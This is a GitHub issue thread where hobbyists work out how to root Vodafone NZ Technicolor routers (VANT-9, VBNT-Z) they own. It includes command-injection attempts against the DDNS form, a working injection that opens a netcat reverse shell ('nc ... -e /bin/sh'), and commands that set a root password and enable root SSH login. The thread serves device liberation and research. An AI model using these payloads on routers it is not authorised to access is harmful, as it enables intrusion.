-
Notifications
You must be signed in to change notification settings - Fork 58
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Support for Technicolor DGA0130VDF (VANT-9) and DNA0130VDF (VBNT-Z) from Vodafone NZ #68
Comments
CRF NUMBER#: CRF897 |
Hello, Have you tried AutoFlashGUI on this model? Could you please post some screenshots of the web GUI Edit: And no, ssh is not running at all, even behind iptables |
Hi kevdagoat, appreciate the reply. The model is not available in AutoFlashGUI. That's interesting. I think their must be a script somewhere to start it as their is a heap of preconfigured ip addresses that seem to be excempt in the iptables routes Give me 5 and I'll get back to you :) |
/modals/tr069.lp gives a 404 Not Found from nginx |
I've tried AutoFlashGUI on the different options just now. I'm using python3 on debian autoflashgui/libautoflashgui.py", line 55, in srp6authenticate /autoflashgui/libautoflashgui.py", line 25, in srp6authenticate and other errors, not sure if it's a OS issue, dependency issue or more likely the web interface isn't programmed into the tool |
Give up on AFG for this device, it's made for the stock tch webui. First chance, set your pc ip to a trusted one and try logging in. Check dropbear settings to determine ifpassword login is allowed and check if it is set by uci-defaults scripts. Also check the vdf webui samba configuration form. Is it allowing arbitrary hostname or workgroup with no proper escaping? If yes, you can try something equivalent to root strategy # 1 Maybe @jameskeenan295 may help you as he already managed to get something for vant-9 |
BTW let me use this thread to update you on VANT-9 & VBNT-Z support progress, here is a checklist to complete for getting it listed on the repo. VANT-9:
VBNT-Z:
|
Sorry for my ambivalence but what is the best way to set one of these trusted IP's as mine on a local network? At the moment I am connected directly to the router via my eth port to it's eth port- Appreciate the help and enjoying the learning |
You can set whatever IP on your nic and connect to your router wan port to try entering the already enabled ssh instance. |
So dropbear doesnt allow password login and I can't seem to get it to talk to devices through wan with a static ip address and vlan set to 0 The cwmp does not use dhcp I mapped out the miniupnp server and was thinking of trying to port forward dropbear but that fails aswell. urn:schemas-upnp-org:service:Layer3Forwarding:1: urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1: urn:schemas-upnp-org:service:WANIPConnection:1: I'm not 100% sure if this would lead to anything but the dynamic dns configuration screen does not seem to sanitize input too much. It replaces quotes " with " but otherwise seems like an entry point /www/docroot/modals/dns-ddns.lp |
When you say you can also push firmwares you mean through a mitm acs? I'm just wondering if we already have the firmware decrypted if their is a way to build a new 'patched' update that can be used via the web interface as if a regular update and sign it somehow using keys from the system I'm poking around the web-interface but it's all written in lua which is new coming from python so not 100% sure on where to look for syntax etc When I connect this to a network with a network running an a modem on 172.16.0.1 I cannot ping 172.16.0.2 or connect to the enabled remote assistance web interface as expected it's weird. These modems have some sort of recovery mode when you hold down the reset as it powers on |
@jameskeenan295 was capable of command execution via that DDNS form as well on the 2.4.6 firmware. Once you manage do execute some commands, let me know, I have something for you to try. In particular I'm interested in knowing if creating a new dropbear instance would not need us to enable that firewall deny option you saw. |
Give up on any CWMP trick on these, I just looked at the above cwmpd settings you posted, they definitely prevent any mitm. |
Thanks @LuKePicci I'll keep you updated! I've used dropbear in the past on another arm camera with a precompiled binary, once you generate the keys you can make one big command that starts dropbear on another port with other keys etc Well cross fingers we can find some command injection but they sanitize mostly everything at least from the frontend it seems. I found a link to an older version of the firmware but cloudfront /vodafone seems to be having issues and I cant download it at the moment. If anyone has a copy of any older firmware would be much appreciated as I look for a way in. cheers for the support |
Give me a mega drop folder where to put them. Probably that link you posted is the correct one even if it is now returning "access denied", this means I could already build torrents for all of them. |
https://mega.nz/megadrop/8DWXMIKmdJA |
Alright weird, so it says its a 17.1.7988-2461009-CRF846-V2.4.6 but this is definitely an earlier version. |
Sure, just try simple commands with noticeable effects, like echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i 's/#//' /etc/inittab
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart |
I still haven't been able to figure out the exact string to get the command injection to work. All I know so far is putting the quotation marks in the username field breaks the module somehow- I've tried :::::::;reboot in the ping and ddns sections and it doesn't work but doesn't break the module edit: I'm taking a break for a while if anyone has any ideas on command execution injections or wants me to portforward the administration interface for them to try get into let me know |
I don't know if commands get executed when ddns scripts run or previously during configuration. However you don't need to go black-box. I would suggest you to try looking into the webui code back to the point where ddns configuration is saved and determine where the injection happens. Also, a comparison with newer patched firmware might be of some help. |
I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running, from the firmware their is a root account but it does not look like a password is set. I've attached the ddns updater source code. It appears to use the openwrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns) It also uses an old version of this script here which is what I am trying to target. It appears to not filter the password as it could contain special characters. I wish I knew lua so am trying to target the bash side of the script. You can set quotation marks etc in the password field and it doesn't break the configuration which is making testing params quicker rather than every test requiring a reboot. I want to try and exploit this no-ip-updater shell script somehow
I've tried some arguments such as:
but haven't been able to quite get the syntax right. Is it possible to inject a command in this script? Attached are the relevant files |
Have you tried this:
domain.com;<command>
… On 13 Dec 2019, at 7:45 am, drbenway6667 ***@***.***> wrote:
I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today
The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running.
I've attached the ddns updater source code. It appears to use the openwrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns)
It also uses an old version of this script here which is what I am trying to target. It appears to not filter the password as it could contain special characters. I wish I knew lua so am trying to target the bash side of the script. You can set quotation marks etc in the password field and it doesn't break the configuration which is making testing params quicker rather than every test requiring a reboot.
I want to try and exploit this no-ip-updater shell script somehow
`
#.Distributed under the terms of the GNU General Public License (GPL) version 2.0
#.2014-2015 Christian Schoenebeck
local __DUMMY
local ***@***.***/nic/update?hostname=[DOMAIN]&myip=[IP]"
[ -z "$username" ] && write_log 14 "Service section not configured correctly! Missing 'username'"
[ -z "$password" ] && write_log 14 "Service section not configured correctly! Missing 'password'"
[ $use_ipv6 -eq 0 ] && __DUMMY="127.0.0.1" || __DUMMY="::1"
write_log 7 "sending dummy IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#[USERNAME]#$URL_USER#g" -e "s#[PASSWORD]#$URL_PASS#g"
-e "s#[DOMAIN]#$domain#g" -e "s#[IP]#$__DUMMY#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1 || return 1
sleep 1
write_log 7 "sending real IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#[USERNAME]#$URL_USER#g" -e "s#[PASSWORD]#$URL_PASS#g"
-e "s#[DOMAIN]#$domain#g" -e "s#[IP]#$__IP#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1
return $?
`
I've tried some arguments such as:
") && reboot && echo (
"] && reboot && echo
"];reboot
"];reboot;
";reboot;
;reboot
";reboot
but haven't been able to quite get the syntax right. Is it possible to inject a command in this script?
The lua script uses a bit of regex and filtering to validate the input and sets the uci variables for the ddns script dynamic_dns_updater.sh which in turn calls the update_no-ip_com.sh if it is configured for no-ip.com
Attached are the relevant files
ddns_files.zip
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or unsubscribe.
|
The tricks for getting root shell on VANT-9 are:
1.1) (not always required) If you've tried TFTP flashing and it still comes up with a version number different to that above, then you need to trigger a bank switch, as follows: There are other methods for doing Bank Switches, but this is fairly straight forward.
in OWASP ZAP, search for "test.com" (or whatever domain you used), then right-click the request >>Open/Resend with request Editor Inject commands, using a semicolon immediately after the domain name (test.com or whatever you used): That is the URL encoded form of: ;nc 192.168.1.5 5000 -e /bin/sh 2.2) Assuming that works, you should now have a shell (as root) on the Windows ncat session. From there you need to enter these commands through the ncat session:
Notes:
Feel free to contact me if that doesn't work, or you need any more info. I am hoping we can get the rooting process implemented into AutoFlashGUI (or something similar?) to make it easier for the everyone. Hardware needs to be liberated, man! Also, Vodafone NZ have implemented a few subtle things in the default config to prevent people using these routers with other ISP's, so there is some additional liberation work required there from this community, to make these usable by all. |
Great job everyone! Very glad to see someone is working on this as so many it these little routers are going to landfill unnecessarily! |
Does anybody know if H500-s and H500-t here mentioned are sharring exact same spec just different manufacturer ? S Sercom T Technicolor ? I'm dying to break my H500s :) |
Usually they have different firmwares but similar housing, specs and web interface UI. |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
Hello guys, I tried to run the forked https://github.com/jameskeenan295/autoflashgui against VBNT-Z but I couldn't connect to port 22 after it's finished running. I tried debugging and got the response of: b'{ "status":"error" }' after it posted the DDNS hack to http://192.168.1.1/modals/internet/dns_ddns.lp. Is that normal? May I know if the hack is still functioning? |
Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295 directly
If you are running the same firmware version that hack was built for, then it must be still functional. |
I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1). I'm just wondering, usually after the DDNS hack, do you get a success response or error response? |
Ok, so you need to use type 3 instructions (ie. flash of type 2 firmware and inactive bank boot via enforced bootfail).
Alternatively, if you manage to grab an RBI of your latest firmware and the firmware offers a firmware upgrade page in its webui then you can use "upgrade" to that same new firmware. This will cause an active bank switch. After the bank switch has occurred, it is enough to flash once again the Type2 firmware you downloaded from the repo via bootp/tftp (this always flashes bank_1). It will boot the old type 2 firmware you can get root on.
Share the RBI for the new firmware if you have it. Otherwise, once you have got root, make sure to get a dump of the new firmware and share it. Then use the safe firmware upgrade instructions to install the new firmware without loosing root access.
…________________________________
From: gingming <notifications@github.com>
Sent: Friday, October 16, 2020 10:49:40 AM
To: hack-technicolor/hack-technicolor <hack-technicolor@noreply.github.com>
Cc: Luca Piccirillo <luca.piccirillo@gmail.com>; Mention <mention@noreply.github.com>
Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68)
Is that normal?
Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295<https://github.com/jameskeenan295> directly
May I know if the hack is still functioning?
If you are running the same firmware version that hack was built for, then it must be still functional.
I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1).
I'm just wondering, usually after the DDNS hack, do you get a success response or error response?
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub<#68 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/ACCRPNT5FPTTAKE6LJT4DP3SLACKJANCNFSM4JY2UBXA>.
|
I think the firmware in the repo link and the latest firmware from Vodafone are both the same. I can't find the old firmware. I did a file comparison using Winmerge and they are identical. |
The old type 2 firmware is that one in the repo. The new firmware is that one your device is running.
…________________________________
From: gingming <notifications@github.com>
Sent: Friday, October 16, 2020 12:44:47 PM
To: hack-technicolor/hack-technicolor <hack-technicolor@noreply.github.com>
Cc: Luca Piccirillo <luca.piccirillo@gmail.com>; Mention <mention@noreply.github.com>
Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68)
Ok, so you need to use type 3 instructions (ie. flash of type 2 firmware and inactive bank boot via enforced bootfail). Alternatively, if you manage to grab an RBI of your latest firmware and the firmware offers a firmware upgrade page in its webui then you can use "upgrade" to that same new firmware. This will cause an active bank switch. After the bank switch has occurred, it is enough to flash once again the Type2 firmware you downloaded from the repo via bootp/tftp (this always flashes bank_1). It will boot the old type 2 firmware you can get root on. Share the RBI for the new firmware if you have it. Otherwise, once you have got root, make sure to get a dump of the new firmware and share it. Then use the safe firmware upgrade instructions to install the new firmware without loosing root access.
…
________________________________ From: gingming notifications@github.com<mailto:notifications@github.com> Sent: Friday, October 16, 2020 10:49:40 AM To: hack-technicolor/hack-technicolor hack-technicolor@noreply.github.com<mailto:hack-technicolor@noreply.github.com> Cc: Luca Piccirillo luca.piccirillo@gmail.com<mailto:luca.piccirillo@gmail.com>; Mention mention@noreply.github.com<mailto:mention@noreply.github.com> Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68<#68>) Is that normal? Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295<https://github.com/jameskeenan295>https://github.com/jameskeenan295 directly May I know if the hack is still functioning? If you are running the same firmware version that hack was built for, then it must be still functional. I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1). I'm just wondering, usually after the DDNS hack, do you get a success response or error response? — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#68 (comment)<#68 (comment)>>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ACCRPNT5FPTTAKE6LJT4DP3SLACKJANCNFSM4JY2UBXA.
Hi,
I think the firmware in the repo link and the latest firmware from Vodafone are both the same. I can't find the old firmware. I did a file comparison using Winmerge and they are identical.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub<#68 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/ACCRPNTW3TL6HQCSXSSHFQDSLAPZ7ANCNFSM4JY2UBXA>.
|
The thing is that, the firmware from the repo (via torrent link) and the firmware that I downloaded from the supplier (http://downloads.vodafone.co.nz/ultrahub-plus/UHP-2-0-1-Prod.rbi) are both the same. I used WinMerge to do the comparison, unless that is not reliable. If that's the case, I don't think type 3 instructions will work as I don't have old firmware that works? |
Correct, but the supplier pushed a newer one into the device.
Type 3 instructions always work as long as there exist a Type 2 RBI available - yes, we have it. |
I followed the Type 3 instructions to flash the firmware via BOOTP flashing. I can see that the firmware has been transmitted to the router. But after that, I'm stuck. I'm not sure how I can Check booted bank etc. How do I do the followings?
I'm using Windows, I'm not sure how I can access the router to read those information. Also, after it's flashed and auto-restarting, should I keep the TFTP Server running? If it is running, then my PC will get 10.0.0.100 as IP. The guide may need some clarification as well. |
need root access, you have not yet
needs serial adapter conneted to device motherboard serial port
BOOTP flashing uses TFTP from firmware transfer, this is exactly what you did so far
Nope, as soon as device reboots you can stop TFTP server and release any IP configuration made on purpuse
Now your device bank_1 contains the firmware you just flashed. Is it booting that old firmware? If yes, then your booted bank is bank_1, otherwise it's booting from bank_2 |
In the end of Type 3 guide you see the following:
The above link points to "Change booted bank", not "Check booted bank", you've got stuck because it is not needed to check the booted bank when coming from phase 2 of type 3 guide |
I believe it's still booting the original firmware. I then tried to upgrade the firmware via WEB GUI and after that, it rebooted, and still on the original firmware. No root can be done. I may try again in case I got it wrong. I'll following the following steps, please let me know if I've got any steps wrong:
Thanks again for your help. |
Your steps are almost correct except 6
Then, since the above caused a switchover, repeat the TFTP steps again. This time the old firmware loaded via BOOTP would overwrite the new one you placed in bank_1 moments ago. The Web GUI basically don't allow you to downgrade, to cause a switch you need to provide it the same or newer firmware version. Let's make this clearer in the wiki. Now, we know you have no RBI available for the current/new firmware so this bankswitch strategy isn't viable. It will become viable for other people once you manage to root and grab this new RBI URL from Vodafone remote management service. So, go back to that "Change booted bank" section, it says you have two options, the first one, switchover is a no go in your situation, unless you keep waiting for Vodafone to push another newer firmware update, so go for the second: bootfail. |
Hmm, it's getting a bit too difficult for me to carry on in that direction now. I may continue in future if Vodafone put the latest firmware (for VBNT-Z) on the website for people to download. Thanks for your help. |
Other people with rooted VBNT-Z may grab it as well. |
These are the same three VANT-9 firmwares we have in the repo |
Has anyone made any further progress with the VANT-9? I have opened one on my bench and captured the attached serial boot output from the onboard UART. It never gets to the point of allowing login so I am not sure that this will add any value. |
VANT-9 is already done, just read through this issue. Basically you need to use a custom version of AFG which is pending to be merged by @mswhirl
You can't use serial console input until you enable it. AFG does it for you while setting up root access. |
Magic, I will give that a crack |
Hi,
I have two vant-9 Technicolor 500-T Vodafone-DGA0130VDF-NZ boxes here I'm trying to unlock.
They run a custom firmware which I've been able to reverse engineer but not get code execution on
It runs an ssh server behind iptables. I've attached some of the firmware. Any help getting code execution here would be awesome to root these boxes get something open source running on them.
I've uploaded the extracted firmware + bins here:
https://mega.nz/#F!kc9wHQhD!hN48b47_1o6NYixBML76xA
Heres some more info I've gathered on the device I'd be keen to try anything to get this unlocked
I'd be really keen to try any ideas that anyone may have. We have a heap of these in our country going to waste and it would be awesome to be able to save them from going in the trash
does anyone know if their is a way to get code execution on this device so I can build custom firmware on it
Cheers,
Henry
The text was updated successfully, but these errors were encountered: